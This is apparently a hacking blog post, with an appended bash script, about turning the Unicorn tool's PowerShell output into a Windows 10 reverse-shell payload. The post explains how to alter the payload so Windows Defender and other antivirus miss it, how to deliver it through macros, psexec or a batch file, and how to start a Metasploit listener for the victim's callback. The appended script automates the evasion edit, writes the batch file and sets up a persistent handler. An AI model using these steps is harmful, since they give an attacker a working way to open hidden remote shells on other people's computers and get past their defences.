Undetectable payload for Windows 10 – Unicorn tool payload modification

In this post, I will explain how to hack Windows 10 with a publicly available tool, using a PowerShell downgrade attack to inject shellcode straight into memory. I will also show how to slightly modify the generated code to avoid detection by Windows Defender and many other antivirus programs. For this purpose, I used the tool Unicorn (https://github.com/trustedsec/unicorn), written by Dave Kennedy (@HackingDave). Unfortunately, on the day of writing this post, the code generated by Unicorn is no longer undetectable, which is why I needed to modify it.

Why did I decide to write about this tool? Well, it is not always easy to write your own PowerShell payload and obfuscate and encode it in a way that does not raise a flag with antivirus systems. Therefore, I think this post will be useful for many hackers and security researchers.

Using this tool is very simple. All you need is a preinstalled Metasploit, which serves as the listener/handler, and of course Unicorn, which automatically generates a PowerShell command. As soon as Unicorn generates the PowerShell command, you can run it directly from a CMD window or deliver it through a payload delivery system. There are many ways to use this attack: through macros in Excel or Word, through psexec inside Metasploit, SQLi, and many more. For more info, please check their page on GitHub, where you will also find the other attack methods available inside Unicorn. In this post, I will focus only on the PowerShell attack.

Note: please do not upload the PowerShell code generated by Unicorn to VirusTotal to test antivirus detection; samples submitted there are shared with the antivirus vendors, which burns the payload.

To start, download Unicorn from GitHub.

sudo git clone https://github.com/trustedsec/unicorn.git
cd unicorn

I assume you are using Kali Linux or Parrot OS, which already have Metasploit preinstalled. Otherwise, install Metasploit as well.

Generate the PowerShell code with the next command.

sudo python unicorn.py windows/shell_reverse_tcp 192.168.1.104 443

Let me explain what this command does. Unicorn generates the windows/shell_reverse_tcp payload and sets the listener IP, in my case 192.168.1.104; of course, you should change it to your own IP. The last argument is the port on which the reverse TCP connection will be established.

The result is written to the file powershell_attack.txt. Copy the whole content of the file into a text editor and modify the first part of the code as follows (the rest of the line, the encoded payload, stays as it is):

powershell -nop -ep bypass /w 1 /C "s''v IVb -;s''v XC e''c;s''v Ik ((g''v IVb).value.toString()+(g''v XC).value.toString());powershell -nop -ep bypass (g''v Ik).value.toString()

As you can see, I added -nop -ep bypass twice: once to the outer powershell that cmd starts and once to the inner powershell that it spawns. -nop (-NoProfile) skips loading the PowerShell profile and -ep bypass (-ExecutionPolicy Bypass) disables the execution policy check; /w 1 is -WindowStyle Hidden and /C is -Command. The s''v and g''v calls are Set-Variable (sv) and Get-Variable (gv) with the command name split by an empty string; they assemble the -ec (-EncodedCommand) switch at run time from the two variables, so the literal switch does not appear in the command line.

Now you can use this code for the attack. In my case, I saved it as a batch file (.bat) and used that for the further attack.

Note: I also tried to generate and modify a Meterpreter reverse TCP payload, but it would not execute. I mean, Windows Defender did not detect it as a virus, but it also did not execute.

Unicorn will also ask you whether you want to start the Metasploit listener. If you decide not to start it now, you can do so later with the generated Metasploit resource script unicorn.rc, in the following way.

sudo msfconsole -r <path to resource script>

As soon as Metasploit is open, type exploit, and Metasploit will start listening for connections. Note that the listener must be running before the PowerShell code is executed on the victim's Windows machine.

You can also do it manually in Metasploit:

sudo msfconsole
use multi/handler
set payload windows/shell_reverse_tcp
set lport <your port>
set lhost <your IP>
exploit

That's it. As I said, it is super easy to use. If everything went OK, you will get a command shell (this payload is windows/shell_reverse_tcp, not Meterpreter), as in the image below.
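The whole procedure above, as an added bash example that is not part of the original post or of the Unicorn project: it applies the same edit the post makes by hand (inserting -nop -ep bypass after both powershell tokens) to a copy of powershell_attack.txt, writes the result as a .bat file, and writes a handler resource script equivalent to the manual msfconsole steps. The sample input is constructed in the shape of the post's snippet, with a placeholder base64 tail that encodes "echo hi"; the exact text Unicorn emits varies by version. The helper names, the file names and the extra "set ExitOnSession false" and "exploit -j" lines in the handler script are assumptions added here, not the post's.

```shell
#!/usr/bin/env bash
# Added example, not code from the original post or from the Unicorn project.
# It automates the manual edit from the post and the handler setup.
#
# Assumptions (not stated on the page): the Unicorn one-liner has the shape
#   powershell /w 1 /C "s''v ...;powershell (g''v X).value.toString() ('<base64>')"
# as in the post's snippet; the helper names, file names and the extra
# "set ExitOnSession false" / "exploit -j" in the handler script are choices made here.

# Apply the post's edit: insert "-nop -ep bypass" after the outer powershell
# (the one cmd starts) and after the inner powershell (the one it spawns).
# Input on stdin, result on stdout. A line that already carries "-ep bypass"
# is passed through unchanged, so running this twice does not double the flags.
add_ps_flags() {
    sed -e '/-ep bypass/b' \
        -e 's/^powershell /powershell -nop -ep bypass /' \
        -e 's/;powershell /;powershell -nop -ep bypass /'
}

# Wrap the patched one-liner in a batch file with CRLF line endings,
# which is what the post does by hand. $1 = powershell_attack.txt, $2 = output .bat
make_bat() {
    {
        printf '@echo off\r\n'
        add_ps_flags < "$1" | awk '{ printf "%s\r\n", $0 }'
    } > "$2"
}

# Write a resource script equivalent to the manual msfconsole steps in the post.
# ExitOnSession false and exploit -j keep the handler up for more than one
# callback and run it as a background job. $1 = LHOST, $2 = LPORT, $3 = output path
write_handler_rc() {
    cat > "$3" <<EOF
use exploit/multi/handler
set payload windows/shell_reverse_tcp
set LHOST $1
set LPORT $2
set ExitOnSession false
exploit -j
EOF
}

# Constructed sample input in the shape of the post's snippet (not real Unicorn
# output). The tail is a placeholder: base64 of the UTF-16LE string "echo hi".
SAMPLE="powershell /w 1 /C \"s''v IVb -;s''v XC e''c;s''v Ik ((g''v IVb).value.toString()+(g''v XC).value.toString());powershell (g''v Ik).value.toString() ('ZQBjAGgAbwAgAGgAaQA=')\""

work="$(mktemp -d)"
printf '%s\n' "$SAMPLE" > "$work/powershell_attack.txt"
make_bat "$work/powershell_attack.txt" "$work/payload.bat"
write_handler_rc 192.168.1.104 443 "$work/handler.rc"

printf 'Patched one-liner:\n%s\n\n' "$(add_ps_flags < "$work/powershell_attack.txt")"
printf 'Wrote %s and %s\n' "$work/payload.bat" "$work/handler.rc"
printf 'Start the listener first: sudo msfconsole -r %s\n' "$work/handler.rc"
```

Run it with bash on the attacking machine: it writes payload.bat and handler.rc into a temporary directory, prints the patched one-liner so you can compare it with the post's snippet, and the listener is then started with the msfconsole -r command from the post, before the .bat file is executed on the target. Because Unicorn's output format changes between versions, confirm that both powershell tokens received the flags before delivering the file.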
